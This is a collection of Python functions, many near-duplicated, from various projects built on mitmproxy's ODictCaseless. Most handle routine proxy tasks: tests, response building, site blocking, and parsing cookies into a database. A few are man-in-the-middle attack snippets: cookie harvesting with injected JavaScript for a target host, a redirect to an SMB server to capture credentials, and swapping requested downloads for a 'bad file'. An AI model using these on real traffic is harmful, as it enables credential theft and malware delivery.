def test_set_cookies(self): resp = tresp() v = resp.cookies v.add("foo", ["bar", ODictCaseless()]) resp.set_cookies(v) v = resp.cookies assert len(v) == 1 assert v["foo"] == [["bar", ODictCaseless()]]
def request(ctx, flow): if flow.request.pretty_host(hostheader=True) == "google.com": if flow.request.path == "/rick_js": print "rick" flow.reply( HTTPResponse([1, 1], 200, "OK", ODictCaseless( [["content-type", "text/javascript"]]), rick_js)) if flow.request.path == "/rick_mp3": print "mp3" flow.reply( HTTPResponse([1, 1], 200, "OK", ODictCaseless([["content-type", "audio/mpeg"]]), rick_mp3))
def with_html(cls, html): response = cls(code=200, content=html, msg="", headers=ODictCaseless(), httpversion=(1, 1)) return response
def _to_libmproxy_response(self, request, response): """ Convert w3af.core.data.url.HTTPResponse.HTTPResponse to libmproxy.http.HTTPResponse """ charset = response.charset body = smart_str(response.body, charset, errors='ignore') header_items = [] for header_name, header_value in response.headers.items(): header_name = smart_str(header_name, charset, errors='ignore') header_value = smart_str(header_value, charset, errors='ignore') header_items.append((header_name, header_value)) headers = ODictCaseless(header_items) # This is an important step! The ExtendedUrllib will gunzip the body # for us, which is great, but we need to change the content-encoding # for the response in order to match the decoded body and avoid the # HTTP client using the proxy from failing headers['content-encoding'] = ['identity'] return LibMITMProxyHTTPResponse(request.httpversion, response.get_code(), str(response.get_msg()), headers, body)
def perform_http_connection(request, url, port): try: conn = httplib.HTTPConnection(url, port) headers = dict(request.headers.items()) conn.request(request.method, request.url, body=request.content, headers=headers) httplib_response = conn.getresponse() headers = ODictCaseless.from_httplib_headers( httplib_response.getheaders()) response = HTTPResponse(code=httplib_response.status, content=httplib_response.read(), msg="", httpversion=(1, 1), headers=headers) return response except Exception as ex: error("Error Happened") error(ex) error("method: %s\nurl: %s\nbody: --\nheaders: --" % (request.method, request.url)) return None
def request(context, flow): if flow.request.host.endswith("com"): resp = Response(flow.request, [1, 1], 301, "OK", ODictCaseless([["Location", "http://www.bbc.co.uk"]]), "", None) flow.request.reply(resp)
def from_intercepted_response(cls, response): headers = ODictCaseless.from_httplib_headers(response.headers) response = cls(code=response.status, content=response.body_response(), msg="", httpversion=(1, 1), headers=headers) return response
def respond(flow, content): resp = Response(flow.request, [1,1], 200, "OK", ODictCaseless([["Content-Type","text/xml"]]), content, None) flow.request.reply(resp)
def set_response(flow, content): print 'Response from server -> ', flow.response flow.response.code = 200 flow.response.msg = "OK" flow.response.headers = ODictCaseless([["Content-Type","text/xml"]]) flow.response.content = content print "Setting new response -> ", flow.response print "Body -> ", content
def request(context, flow): req = flow.request if history.should_skip(req.url): context.log("skipping: %s" % req.url) resp = HTTPResponse((1, 1), 304, "NOT MODIFIED", ODictCaseless(), None) flow.reply(resp)
def handle_request(self, flow): if flow.request.headers['LOG']: resp = HTTPResponse([1, 1], 404, "Not Found", ODictCaseless([["Content-Type", "text/html"]]), "Caught by proxy") self.log += flow.request.content + "\r\n" flow.reply(resp) else: flow.reply()
def request(context, flow): if flow.request.host.endswith("example.com"): resp = HTTPResponse([1, 1], 200, "OK", ODictCaseless([["Content-Type", "text/html"]]), "helloworld") flow.request.reply(resp) if flow.request.host.endswith("example.org"): flow.request.host = "mitmproxy.org" flow.request.headers["Host"] = ["mitmproxy.org"]
def send_connect_request(conn, host, port): upstream_request = HTTPRequest("authority", "CONNECT", None, host, port, None, (1, 1), ODictCaseless(), "") conn.send(upstream_request._assemble()) resp = HTTPResponse.from_stream(conn.rfile, upstream_request.method) if resp.code != 200: raise proxy.ProxyError( resp.code, "Cannot establish SSL " + "connection with upstream proxy: \r\n" + str(resp._assemble())) return resp
def request(context, flow): try: if flow.request.pretty_host(hostheader=True).endswith("localhost"): if flow.request.path.strip().startswith("/commands/exit"): resp = HTTPResponse([1, 1], 200, "OK", ODictCaseless( [["Content-Type", "text/html"]]), "done %s" % context.fullLogPath) context.lock.acquire() if not context.outFile.closed: context.outFile.write('EndFile\n') context.outFile.close() context.lock.release() print "close file ", context.fullLogPath flow.reply(resp) else: print flow.request.path.strip() #d = flow.request.path.find('?') #realPath = flow.request.path #if d != -1: # realPath = flow.request.path[:d] url = "%s://%s%s" % (flow.request.scheme, flow.request.host, flow.request.path) o = urlparse(url) url = "%s://%s%s" % (flow.request.scheme, o.netloc, o.path) url = url.lower() currentTime = int(time.time()) if url == context.firstURL: context.lock.acquire() print "find first url ", url context.startTime = currentTime context.lock.release() if context.suspendURL and url == context.suspendURL: print "target url wait for %d seconds" % context.threshold context.lock.acquire() log = "%d TARGETURL:%s START\n" % (currentTime, url) if not context.outFile.closed: context.outFile.write(log) context.lock.release() time.sleep(context.threshold) currentTime = int(time.time()) context.lock.acquire() log = "%d TARGETURL:%s END\n" % (currentTime, url) if not context.outFile.closed: context.outFile.write(log) context.lock.release() else: context.lock.acquire() log = "%d REGULARURL:%s END\n" % (currentTime, url) if not context.outFile.closed: context.outFile.write(log) context.lock.release() except Exception as e: print >> sys.stderr, "error %s: [%s]" % (str(e), url)
def handle_request(self, flow): hid = (flow.request.host, flow.request.port) if flow.request.host == self.options.target: self.collect_cookies(flow.request.headers) resp = HTTPResponse( [1, 1], 200, "", ODictCaseless([["Content-Type", "application/javascript"]]), self.js_code) flow.reply(resp) flow.reply()
def build_flow_response(self, req, status, status_text, headers, body): headers = ODictCaseless() for k,v in headers: headers[k] = v logging.info("%d %s (%d) [%s %s]: ", status, status_text, len(body), req.method, req.get_url()) resp = flow.Response(req, [1,1], status, status_text, headers, body, None) return resp
def request(context, flow): # pretty_host(hostheader=True) takes the Host: header of the request into account, # which is useful in transparent mode where we usually only have the IP otherwise. # Method 1: Answer with a locally generated response header = flow.request.pretty_host(hostheader=True) if not header in whitelist: resp = HTTPResponse( [1, 1], 200, "OK", ODictCaseless([["Content-Type", "text/html"]]), template.replace('$URL', flow.request.url)) flow.reply(resp)
def request(flow): if flow.request.pretty_host.endswith("sojourncollege.com"): resp = Response(flow.request, [1,1], 302, "OK", ODictCaseless([["Content-Type","text/html"]]), "helloworld", None) flow.request.reply(resp) if flow.request.host.endswith("sojourncollege.com"): flow.request.host = "mitmproxy.org" flow.request.headers["Host"] = ["mitmproxy.org"]
def add_flow(address, request, response): flow = Flow( Request(client_conn=ClientConnect(address), httpversion=[1, 1], host="dnschef", port=53, scheme="dns", method="DNS", path="/%s/%s-record" % (str(request.q.qname), str(QTYPE[request.q.qtype]).lower()), headers=ODictCaseless([[ "Content-Type", "dnschef/%srecord" % str(QTYPE[request.q.qtype]).lower() ]]), content=str(request))) flow.response = Response( flow.request, [1, 1], 200, "FAKE-HTTP", ODictCaseless([[ "Content-Type", "dnschef/%s-record" % str(QTYPE[request.q.qtype]).lower() ]]), str(response), None) ctx._master.load_flow(flow)
def request(context, flow): should_redirect = True # Modify this value to disable redirection for the current request if should_redirect is not None and should_redirect: resp = HTTPResponse([1, 1], 302, "Found", ODictCaseless([["Content-Type", "text/html"], [ "Location", "file://{0}/{1}".format( context.smbserver_ip, context.identifier) ]]), "") flow.reply(resp)
def request(context, flow): # pretty_host(hostheader=True) takes the Host: header of the request into account, # which is useful in transparent mode where we usually only have the IP # otherwise. # Method 1: Answer with a locally generated response if flow.request.pretty_host(hostheader=True).endswith("openwifi.com"): reader = open('data.txt', 'r') links = reader.read() reader.close() resp = HTTPResponse([1, 1], 200, "OK", ODictCaseless([["Content-Type", "text/html"]]), links) flow.reply(resp)
def request(context, flow): replacer = FindRules('default.rulesets') if flow.request.scheme == 'http': url = replacer.find('http://' + flow.request.pretty_host(hostheader=True) + flow.request.path) if url: flow.request.url = url else: flow.reply( HTTPResponse( [1, 1], 403, 'FORBIDDEN', ODictCaseless([["Content-Type", "text/html"]]), "The requested page can not be accessed securely"))
def request(context, flow): if flow.request.path.endswith(context.filename_suffix): context.log("Poisoning the requested file") context.log(flow.request.path) context.log("Closing server connection") flow.server_conn.close() # TODO: Don't read the whole file in memory-maybe use a web server that already solves this with open(context.path_to_bad_file, "rb") as f: resp = HTTPResponse([1, 1], 200, "OK", ODictCaseless([[ "Content-Type", guess_type(context.path_to_bad_file)[0] ]]), f.read()) flow.reply(resp)
def do_request(context, flow): """ Called when a client request has been received. """ # context.log("[nick] request") global DeviceState resp = None # print DeviceState # print flow.request.headers if (flow.request.pretty_host(hostheader=True).endswith("captive.apple.com") or flow.request.path in r'/library/test/success.html') and flow.request.headers['X-Real-IP']: for key, value in DeviceState.items(): if int(time.time()) - value[1] > 300: del DeviceState[key] RealIP = flow.request.headers['X-Real-IP'][0] ServerIP = flow.request.headers['ServerAddress'][0] # print ServerIP AdLink = "http://%s/withficode/ios/index.htm"%ServerIP SuccessResp=HTTPResponse([1, 1], 200, "OK", ODictCaseless([["Content-Type", "text/html"]]), "<HTML><HEAD><TITLE>Success</TITLE></HEAD><BODY>Success</BODY></HTML>") PendingResp=HTTPResponse([1, 1], 302, "OK",ODictCaseless([["Content-Type", "text/html"], ["location", AdLink]]),"") if RealIP in DeviceState.keys(): if DeviceState[RealIP][0] == 'accept': resp = SuccessResp elif DeviceState[RealIP][0] == 'pending': resp = PendingResp DeviceState[RealIP][0] = 'accept' else: resp = PendingResp DeviceState[RealIP] = ['pending', int(time.time())] flow.reply(resp)
def send_connect_request(conn, host, port, update_state=True): upstream_request = HTTPRequest("authority", "CONNECT", None, host, port, None, (1, 1), ODictCaseless(), "") conn.send(upstream_request.assemble()) resp = HTTPResponse.from_stream(conn.rfile, upstream_request.method) if resp.code != 200: raise proxy.ProxyError( resp.code, "Cannot establish SSL " + "connection with upstream proxy: \r\n" + str(resp.assemble())) if update_state: conn.state.append(("http", { "state": "connect", "host": host, "port": port })) return resp
def request(context, flow): # pretty_host(hostheader=True) takes the Host: header of the request into account, # which is useful in transparent mode where we usually only have the IP # otherwise. # Method 1: Answer with a locally generated response if flow.request.pretty_host(hostheader=True).endswith("example.com"): resp = HTTPResponse([1, 1], 200, "OK", ODictCaseless([["Content-Type", "text/html"]]), "helloworld") flow.reply(resp) # Method 2: Redirect the request to a different server if flow.request.pretty_host(hostheader=True).endswith("example.org"): flow.request.host = "mitmproxy.org" flow.request.update_host_header()
def _to_libmproxy_response(self, request, response): """ Convert w3af.core.data.url.HTTPResponse.HTTPResponse to libmproxy.http.HTTPResponse """ charset = response.charset body = smart_str(response.body, charset, errors='ignore') header_items = [] for header_name, header_value in response.headers.items(): header_name = smart_str(header_name, charset, errors='ignore') header_value = smart_str(header_value, charset, errors='ignore') header_items.append((header_name, header_value)) headers = ODictCaseless(header_items) return LibMITMProxyHTTPResponse(request.httpversion, response.get_code(), str(response.get_msg()), headers, body)
def perform_http_connection(request, url, port): try: conn = httplib.HTTPConnection(url, port) headers = dict(request.headers.items()) conn.request(request.method, request.url, body=request.content, headers=headers) httplib_response = conn.getresponse() headers = ODictCaseless.from_httplib_headers(httplib_response.getheaders()) response = HTTPResponse(code=httplib_response.status, content=httplib_response.read(), msg="", httpversion=(1, 1), headers=headers) return response except Exception as ex: error("Error Happened") error(ex) error("method: %s\nurl: %s\nbody: --\nheaders: --" % (request.method, request.url)) return None
def handle_request(self, msg): f = flow.FlowMaster.handle_request(self, msg) fullURL = f.request.scheme + '://' + f.request.host if ((f.request.scheme == 'http' and f.request.port == 80) == False and (f.request.scheme == 'https' and f.request.port == 443) == False): fullURL = fullURL + ':' + str(f.request.port) fullURL = fullURL + f.request.path send_message(json.dumps({'method': 'log', 'message': fullURL})) if (f.request.host == 'mitm.it'): path = f.request.path if path.find('?') > -1: path = path[:path.find('?')] if path == '/': path = '/index.html' mimeType = ''; if path.rfind('.') > -1: extension = path[path.rfind('.') + 1:] if extension == 'html': mimeType = 'text/html' elif extension == 'css': mimeType = 'text/css' elif extension == 'cer': mimeType = 'application/pkix-cert' elif extension == 'pem': mimeType = 'application/x-pem-file' elif extension == 'p12': mimeType = 'application/x-pkcs12' responseHeaders = ODictCaseless([('content-type', mimeType)]) try: if path in ['/mitmproxy-ca-cert.cer', '/mitmproxy-ca-cert.pem', '/mitmproxy-ca-cert.p12']: with open(expanduser('~/.mitmproxy' + path), 'rb') as certfile: content = certfile.read() elif path in ['/index.html', '/mitmproxy.css']: with open(sys.prefix + '/tamper-cert' + path, 'rb') as uifile: content = uifile.read() responseHeaders['Content-Length'] = [len(content)] resp = HTTPResponse([1,1], 200, 'OK', responseHeaders, content) msg.reply(resp) except: resp = HTTPResponse([1,1], 404, 'Not Found', ODictCaseless([]), '') msg.reply(resp) for url in urlsToProxy: regexURL = '^' + re.escape(url['url']).replace('\\*', '.*?') + '$' if (re.match(regexURL, fullURL) and url['isEnabled'] == True): send_message(json.dumps({'method': 'log', 'message': 'Serving cached file (' + url['cachedFilename'] + ')'})) localFile = open(self._cachedFilesPath + url['cachedFilename'], 'r'); content = localFile.read() localFile.close(); responseHeaders = [] hasViaHeader = False for header in url['responseHeaders']: if (header['name'].lower() != 'content-encoding'): if (header['name'].lower() == 'via'): hasViaHeader = True if (header['value'].find('tamper') == -1): header['value'] += ', tamper' responseHeaders.append((header['name'], header['value'])) if (not hasViaHeader): responseHeaders.append(['via', 'tamper']) responseHeaders.append(['Cache-Control', 'no-cache, no-store, must-revalidate']) responseHeaders.append(['Pragma', 'no-cache']) responseHeaders.append(['Expires', '0']) resp = HTTPResponse([1,1], 200, 'OK', ODictCaseless(responseHeaders), content) msg.reply(resp) break if 'Accept-Encoding' in f.request.headers: f.request.headers['Accept-Encoding'] = ['none'] if f: msg.reply() return f
def build_http_cookie_table(database, verbose=False): """ Extracts all http-cookie data from HTTP headers and generates a new table """ con = sqlite3.connect(database) cur1 = con.cursor() cur2 = con.cursor() cur1.execute("CREATE TABLE IF NOT EXISTS http_request_cookies ( \ id INTEGER PRIMARY KEY AUTOINCREMENT, \ crawl_id INTEGER NOT NULL, \ header_id INTEGER NOT NULL, \ name VARCHAR(200) NOT NULL, \ value TEXT NOT NULL, \ accessed DATETIME);") cur1.execute("CREATE TABLE IF NOT EXISTS http_response_cookies ( \ id INTEGER PRIMARY KEY AUTOINCREMENT, \ crawl_id INTEGER NOT NULL, \ header_id INTEGER NOT NULL, \ name VARCHAR(200) NOT NULL, \ value TEXT NOT NULL, \ domain VARCHAR(500), \ path VARCHAR(500), \ expires DATETIME, \ max_age REAL, \ httponly BOOLEAN, \ secure BOOLEAN, \ comment VARCHAR(200), \ version VARCHAR(100), \ accessed DATETIME);") con.commit() # Parse http request cookies commit = 0 last_commit = 0 cur1.execute("SELECT id, crawl_id, headers, time_stamp FROM http_requests \ WHERE id NOT IN (SELECT header_id FROM http_request_cookies)") row = cur1.fetchone() while row is not None: req_id, crawl_id, header_str, time_stamp = row header = ODictCaseless() try: header.load_state(json.loads(header_str)) except ValueError: #XXX temporary shim -- should be removed header.load_state(eval(header_str)) for cookie_str in header['Cookie']: queries = parse_cookies(cookie_str, verbose) for query in queries: cur2.execute("INSERT INTO http_request_cookies \ (crawl_id, header_id, name, value, accessed) \ VALUES (?,?,?,?,?)", (crawl_id, req_id)+query+(time_stamp,)) commit += 1 if commit % 10000 == 0 and commit != 0 and commit != last_commit: last_commit = commit con.commit() if verbose: print str(commit) + " Cookies Processed" row = cur1.fetchone() con.commit() print "Processing HTTP Request Cookies Complete" # Parse http response cookies commit = 0 last_commit = 0 cur1.execute("SELECT id, crawl_id, url, headers, time_stamp FROM http_responses \ WHERE id NOT IN (SELECT header_id FROM http_response_cookies)") row = cur1.fetchone() while row is not None: resp_id, crawl_id, req_url, header_str, time_stamp = row header = ODictCaseless() try: header.load_state(json.loads(header_str)) except ValueError: #XXX temporary shim -- should be removed header.load_state(eval(header_str)) for cookie_str in header['Set-Cookie']: queries = parse_cookies(cookie_str, verbose, url=req_url, response_cookie=True) for query in queries: cur2.execute("INSERT INTO http_response_cookies \ (crawl_id, header_id, name, \ value, domain, path, expires, max_age, \ httponly, secure, comment, version, accessed) \ VALUES (?,?,?,?,?,?,?,?,?,?,?,?,?)", (crawl_id, resp_id)+query+(time_stamp,)) commit += 1 if commit % 10000 == 0 and commit != 0 and commit != last_commit: last_commit = commit con.commit() if verbose: print str(commit) + " Cookies Processed" row = cur1.fetchone() con.commit() print "Processing HTTP Response Cookies Complete" con.close()
def build_http_cookie_table(database, verbose=False): """ Extracts all http-cookie data from HTTP headers and generates a new table """ con = sqlite3.connect(database) cur1 = con.cursor() cur2 = con.cursor() cur1.execute("CREATE TABLE IF NOT EXISTS http_request_cookies ( \ id INTEGER PRIMARY KEY AUTOINCREMENT, \ crawl_id INTEGER NOT NULL, \ header_id INTEGER NOT NULL, \ name VARCHAR(200) NOT NULL, \ value TEXT NOT NULL, \ accessed DATETIME);") cur1.execute("CREATE TABLE IF NOT EXISTS http_response_cookies ( \ id INTEGER PRIMARY KEY AUTOINCREMENT, \ crawl_id INTEGER NOT NULL, \ header_id INTEGER NOT NULL, \ name VARCHAR(200) NOT NULL, \ value TEXT NOT NULL, \ domain VARCHAR(500), \ path VARCHAR(500), \ expires DATETIME, \ max_age REAL, \ httponly BOOLEAN, \ secure BOOLEAN, \ comment VARCHAR(200), \ version VARCHAR(100), \ accessed DATETIME);") con.commit() # Parse http request cookies commit = 0 last_commit = 0 cur1.execute( "SELECT id, crawl_id, headers, time_stamp FROM http_requests_proxy \ WHERE id NOT IN (SELECT header_id FROM http_request_cookies)" ) row = cur1.fetchone() while row is not None: req_id, crawl_id, header_str, time_stamp = row header = ODictCaseless() try: header.load_state(json.loads(header_str)) except ValueError: #XXX temporary shim -- should be removed header.load_state(eval(header_str)) for cookie_str in header['Cookie']: queries = parse_cookies(cookie_str, verbose) for query in queries: cur2.execute( "INSERT INTO http_request_cookies \ (crawl_id, header_id, name, value, accessed) \ VALUES (?,?,?,?,?)", (crawl_id, req_id) + query + (time_stamp, )) commit += 1 if commit % 10000 == 0 and commit != 0 and commit != last_commit: last_commit = commit con.commit() if verbose: print str(commit) + " Cookies Processed" row = cur1.fetchone() con.commit() print "Processing HTTP Request Cookies Complete" # Parse http response cookies commit = 0 last_commit = 0 cur1.execute( "SELECT id, crawl_id, url, headers, time_stamp FROM http_responses_proxy \ WHERE id NOT IN (SELECT header_id FROM http_response_cookies)" ) row = cur1.fetchone() while row is not None: resp_id, crawl_id, req_url, header_str, time_stamp = row header = ODictCaseless() try: header.load_state(json.loads(header_str)) except ValueError: #XXX temporary shim -- should be removed header.load_state(eval(header_str)) for cookie_str in header['Set-Cookie']: queries = parse_cookies(cookie_str, verbose, url=req_url, response_cookie=True) for query in queries: cur2.execute( "INSERT INTO http_response_cookies \ (crawl_id, header_id, name, \ value, domain, path, expires, max_age, \ httponly, secure, comment, version, accessed) \ VALUES (?,?,?,?,?,?,?,?,?,?,?,?,?)", (crawl_id, resp_id) + query + (time_stamp, )) commit += 1 if commit % 10000 == 0 and commit != 0 and commit != last_commit: last_commit = commit con.commit() if verbose: print str(commit) + " Cookies Processed" row = cur1.fetchone() con.commit() print "Processing HTTP Response Cookies Complete" con.close()
def handle_request(self, msg): f = flow.FlowMaster.handle_request(self, msg) fullURL = f.request.scheme + '://' + f.request.host if ((f.request.scheme == 'http' and f.request.port == 80) == False and (f.request.scheme == 'https' and f.request.port == 443) == False): fullURL = fullURL + ':' + str(f.request.port) fullURL = fullURL + f.request.path send_message(json.dumps({'method': 'log', 'message': fullURL})) if (f.request.host == 'mitm.it'): path = f.request.path if path.find('?') > -1: path = path[:path.find('?')] if path == '/': path = '/index.html' mimeType = '' if path.rfind('.') > -1: extension = path[path.rfind('.') + 1:] if extension == 'html': mimeType = 'text/html' elif extension == 'css': mimeType = 'text/css' elif extension == 'cer': mimeType = 'application/pkix-cert' elif extension == 'pem': mimeType = 'application/x-pem-file' elif extension == 'p12': mimeType = 'application/x-pkcs12' responseHeaders = ODictCaseless([('content-type', mimeType)]) try: if path in [ '/mitmproxy-ca-cert.cer', '/mitmproxy-ca-cert.pem', '/mitmproxy-ca-cert.p12' ]: with open(expanduser('~/.mitmproxy' + path), 'rb') as certfile: content = certfile.read() elif path in ['/index.html', '/mitmproxy.css']: with open(sys.prefix + '/tamper-files' + path, 'rb') as uifile: content = uifile.read() responseHeaders['Content-Length'] = [len(content)] resp = HTTPResponse([1, 1], 200, 'OK', responseHeaders, content) msg.reply(resp) except: resp = HTTPResponse([1, 1], 404, 'Not Found', ODictCaseless([]), '') msg.reply(resp) for url in urlsToProxy: regexURL = '^' + re.escape(url['url']).replace('\\*', '.*?') + '$' if (re.match(regexURL, fullURL) and url['isEnabled'] == True): send_message( json.dumps({ 'method': 'log', 'message': 'Serving cached file (' + url['cachedFilename'] + ')' })) localFile = open(self._cachedFilesPath + url['cachedFilename'], 'r') content = localFile.read() localFile.close() responseHeaders = [] hasViaHeader = False for header in url['responseHeaders']: if (header['name'].lower() != 'content-encoding'): if (header['name'].lower() == 'via'): hasViaHeader = True if (header['value'].find('tamper') == -1): header['value'] += ', tamper' responseHeaders.append( (header['name'], header['value'])) if (not hasViaHeader): responseHeaders.append(['via', 'tamper']) responseHeaders.append( ['Cache-Control', 'no-cache, no-store, must-revalidate']) responseHeaders.append(['Pragma', 'no-cache']) responseHeaders.append(['Expires', '0']) resp = HTTPResponse([1, 1], 200, 'OK', ODictCaseless(responseHeaders), content) msg.reply(resp) break if 'Accept-Encoding' in f.request.headers: f.request.headers['Accept-Encoding'] = ['none'] if f: msg.reply() return f
def request(context, flow): global social_networks global web_searchs global SS global SN global BL global WL # pretty_host(hostheader=True) takes the Host: header of the request into account, # Kontrola casu # Obsah pro dospele ################################ # Content grabbing for testing #try: # home = expanduser("~") # site_data = urllib2.urlopen("http://"+flow.request.pretty_host(hostheader=True)).read() # text_file = open(home+"/temp.txt", "w") # text_file.write(site_data) # text_file.close() #except: # pass ################################ # Checking WL if (WL): if (WL[0] != ''): if flow.request.pretty_host(hostheader=True).endswith(tuple(WL)): return 1 # Checking if page is on BL if flow.request.pretty_host(hostheader=True).endswith(tuple(BL)): #print flow.request.pretty_host(hostheader=True) resp = HTTPResponse([1, 1], 200, "OK", ODictCaseless([["Content-Type", "text/html"]]), "Reason: This site is on Black list") flow.reply(resp) # Checking if social networks are banned if (SS): if flow.request.pretty_host(hostheader=True).endswith( tuple(social_networks)): #print flow.request.pretty_host(hostheader=True) resp = HTTPResponse([1, 1], 200, "OK", ODictCaseless([["Content-Type", "text/html"]]), "Reason: Social network is blocked") flow.reply(resp) # Checking if web searches are banned if (SN): if flow.request.pretty_host(hostheader=True).endswith( tuple(web_searchs)): #print flow.request.pretty_host(hostheader=True) resp = HTTPResponse( [1, 1], 200, "OK", ODictCaseless([["Content-Type", "text/html"]]), "Reason: This websearch is blocked, try http://google.com") flow.reply(resp) # Method 2: Redirect the request to a different server if flow.request.pretty_host(hostheader=True).endswith(tuple(web_searchs)): flow.request.host = "google.com" flow.request.update_host_header()
def handle_request(self, msg): f = flow.FlowMaster.handle_request(self, msg) fullURL = f.request.scheme + "://" + f.request.host if (f.request.scheme == "http" and f.request.port == 80) == False and ( f.request.scheme == "https" and f.request.port == 443 ) == False: fullURL = fullURL + ":" + str(f.request.port) fullURL = fullURL + f.request.path send_message(json.dumps({"method": "log", "message": fullURL})) if f.request.host == "mitm.it": path = f.request.path if path.find("?") > -1: path = path[: path.find("?")] if path == "/": path = "/index.html" mimeType = "" if path.rfind(".") > -1: extension = path[path.rfind(".") + 1 :] if extension == "html": mimeType = "text/html" elif extension == "css": mimeType = "text/css" elif extension == "cer": mimeType = "application/pkix-cert" elif extension == "pem": mimeType = "application/x-pem-file" elif extension == "p12": mimeType = "application/x-pkcs12" responseHeaders = ODictCaseless([("content-type", mimeType)]) try: if path in ["/mitmproxy-ca-cert.cer", "/mitmproxy-ca-cert.pem", "/mitmproxy-ca-cert.p12"]: with open(expanduser("~/.mitmproxy" + path), "rb") as certfile: content = certfile.read() elif path in ["/index.html", "/mitmproxy.css"]: with open(sys.prefix + "/tamper-files" + path, "rb") as uifile: content = uifile.read() responseHeaders["Content-Length"] = [len(content)] resp = HTTPResponse([1, 1], 200, "OK", responseHeaders, content) msg.reply(resp) except: resp = HTTPResponse([1, 1], 404, "Not Found", ODictCaseless([]), "") msg.reply(resp) for url in urlsToProxy: regexURL = "^" + re.escape(url["url"]).replace("\\*", ".*?") + "$" if re.match(regexURL, fullURL) and url["isEnabled"] == True: send_message( json.dumps({"method": "log", "message": "Serving cached file (" + url["cachedFilename"] + ")"}) ) localFile = open(self._cachedFilesPath + url["cachedFilename"], "r") content = localFile.read() localFile.close() responseHeaders = [] hasViaHeader = False for header in url["responseHeaders"]: if header["name"].lower() != "content-encoding": if header["name"].lower() == "via": hasViaHeader = True if header["value"].find("tamper") == -1: header["value"] += ", tamper" responseHeaders.append((str(header["name"]), str(header["value"]))) if not hasViaHeader: responseHeaders.append(["via", "tamper"]) responseHeaders.append(["Cache-Control", "no-cache, no-store, must-revalidate"]) responseHeaders.append(["Pragma", "no-cache"]) responseHeaders.append(["Expires", "0"]) resp = HTTPResponse([1, 1], 200, "OK", ODictCaseless(responseHeaders), content) msg.reply(resp) break if "Accept-Encoding" in f.request.headers: f.request.headers["Accept-Encoding"] = ["none"] if f: msg.reply() return f